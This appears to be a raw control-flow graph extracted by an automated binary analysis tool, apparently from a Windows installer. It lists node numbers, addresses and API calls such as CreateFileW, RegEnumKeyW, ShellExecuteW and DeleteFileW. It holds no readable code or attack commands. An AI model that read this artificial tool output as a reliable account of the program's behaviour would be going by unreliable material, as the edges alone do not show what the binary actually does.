3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
